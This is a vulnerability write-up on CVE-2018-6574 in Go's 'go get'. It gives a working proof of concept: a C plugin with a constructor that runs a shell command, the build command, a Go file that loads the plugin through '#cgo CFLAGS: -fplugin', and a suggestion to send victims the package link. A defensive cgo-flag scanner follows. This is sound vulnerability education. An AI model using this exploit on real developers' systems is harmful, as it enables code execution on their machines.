CVE-2018-6574: RCE via go get
This vulnerability affects the Go "go get" command and allows an attacker to gain code execution on any system that installs their malicious library. It is a good example of a vulnerability that can be combined with typosquatting to gain code execution on developers' workstations and production systems. It was fixed in Go 1.8.7, 1.9.4 and 1.10rc2.
The issue
The issue comes from the fact that, when installing a package, Go also builds the package's native (cgo) code. The #cgo directives in the package source can pass additional flags to the C compiler, which is enough to gain code execution; CFLAGS, for example, can be used.
Exploitation
First, we need to host our malicious package. This requires a website served over TLS with a valid certificate chain; an easy way to get one is to use github.com.
Then, you will need a malicious plugin (.so file). The code below should help you with that:
attack.c
#include <stdio.h>
#include <stdlib.h>
static void malicious() __attribute__((constructor));
void malicious() {
system("touch /tmp/rezydev"); // Custom command here, maybe reverse shell or something similar!
}
You can build it using the following command:
$ gcc -shared -o attack.so -fPIC attack.c
You will need to build that plugin on the same platform and architecture as the victim, here Linux 64-bit.
Finally, you need the Go code that tells cgo to load your plugin:
package main

// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
//     return f();
// }
//
// int fortytwo(){
//     return 42;
// }
import "C"
import "fmt"

func main() {
	f := C.intFunc(C.fortytwo)
	fmt.Println(int(C.bridge_int_func(f)))
	// Output: 42
}
Once you host the full payload on GitHub, you only need to pass the package link to the victim.
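On the defensive side, the thing to look for before building third-party code is exactly the mechanism described above: a #cgo directive in the preamble of an import "C" that passes unusual flags to the compiler or linker. The program below is an added example written for this page, not code from the original post or from the Go project. It parses a Go source file with go/parser, inspects only the comments cgo actually reads (those attached to import "C"), and reports every flag that is not on a small allowlist. The allowlist itself is an assumption of this example and is deliberately narrow; the two embedded source files are constructed samples, the second one reusing the -fplugin=./attack.so flag shown above.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"regexp"
	"strings"
)

// Finding describes one cgo flag that fell outside the allowlist.
type Finding struct {
	File string
	Line int
	Key  string // CFLAGS, CPPFLAGS, CXXFLAGS, FFLAGS or LDFLAGS
	Flag string
}

// cgoLine matches "#cgo [build constraints] KEY: flags" in a preamble line.
var cgoLine = regexp.MustCompile(`^#cgo(?:\s+[A-Za-z0-9_,!/]+)*\s+(CFLAGS|CPPFLAGS|CXXFLAGS|FFLAGS|LDFLAGS):\s*(.*)$`)

// allowed is a deliberately small allowlist (an assumption of this example,
// not the Go toolchain's own list): defines, include/library paths, optimisation
// and warning levels, and plain -l linking. Anything else, including -fplugin,
// -specs or -Wl,... passthroughs, is reported.
var allowed = regexp.MustCompile(`^(?:-D[A-Za-z_]\w*(?:=[\w.]*)?|-I\.?[\w./-]*|-O[0-3sz]?|-W[\w=-]*|-std=[\w+]+|-l[\w.-]+|-L\.?[\w./-]*|-g|-fPIC|-pthread)$`)

// scanCgoDirectives parses one Go source file and returns every flag in a
// #cgo directive that is not on the allowlist. Only comment groups attached to
// `import "C"` are inspected, because those are the only ones cgo honours.
func scanCgoDirectives(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, parser.ParseComments)
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, decl := range f.Decls {
		gd, ok := decl.(*ast.GenDecl)
		if !ok || gd.Tok != token.IMPORT {
			continue
		}
		for _, spec := range gd.Specs {
			imp := spec.(*ast.ImportSpec)
			if imp.Path.Value != `"C"` {
				continue
			}
			// A bare `import "C"` carries the preamble on the GenDecl; inside an
			// import (...) block it sits on the spec. Check both.
			for _, doc := range []*ast.CommentGroup{gd.Doc, imp.Doc} {
				if doc == nil {
					continue
				}
				for _, c := range doc.List {
					out = append(out, checkComment(fset, filename, c)...)
				}
			}
		}
	}
	return out, nil
}

// checkComment splits one // or /* */ comment into lines and checks each #cgo line.
func checkComment(fset *token.FileSet, filename string, c *ast.Comment) []Finding {
	text := c.Text
	if strings.HasPrefix(text, "//") {
		text = text[2:]
	} else {
		text = strings.TrimSuffix(strings.TrimPrefix(text, "/*"), "*/")
	}
	base := fset.Position(c.Pos()).Line
	var out []Finding
	for i, line := range strings.Split(text, "\n") {
		m := cgoLine.FindStringSubmatch(strings.TrimSpace(line))
		if m == nil {
			continue
		}
		for _, flag := range strings.Fields(m[2]) {
			if !allowed.MatchString(flag) {
				out = append(out, Finding{File: filename, Line: base + i, Key: m[1], Flag: flag})
			}
		}
	}
	return out
}

// Constructed sample: an ordinary cgo preamble that should produce no findings.
const benignSrc = `package main

// #cgo CFLAGS: -O2 -Wall -I./include
// #cgo LDFLAGS: -L./lib -lfoo
// int fortytwo() { return 42; }
import "C"

func main() {}
`

// Constructed sample: the same shape of preamble carrying the -fplugin flag
// discussed on this page; the reported line number is that of the directive.
const suspiciousSrc = `package main

// #cgo CFLAGS: -I./include -fplugin=./attack.so
// #cgo LDFLAGS: -lm
// int fortytwo() { return 42; }
import "C"

func main() {}
`

func main() {
	for name, src := range map[string]string{"benign.go": benignSrc, "suspicious.go": suspiciousSrc} {
		findings, err := scanCgoDirectives(name, src)
		if err != nil {
			fmt.Println(name, "parse error:", err)
			continue
		}
		for _, f := range findings {
			fmt.Printf("%s:%d: %s contains flag %q outside the allowlist\n", f.File, f.Line, f.Key, f.Flag)
		}
	}
}
```

Running the program prints one line for suspicious.go (line 3, CFLAGS, "-fplugin=./attack.so") and nothing for benign.go. A scan like this is a pre-build gate, not a replacement for upgrading past the fixed releases; building untrusted code with CGO_ENABLED=0 removes the cgo path entirely, at the cost of packages that genuinely need it.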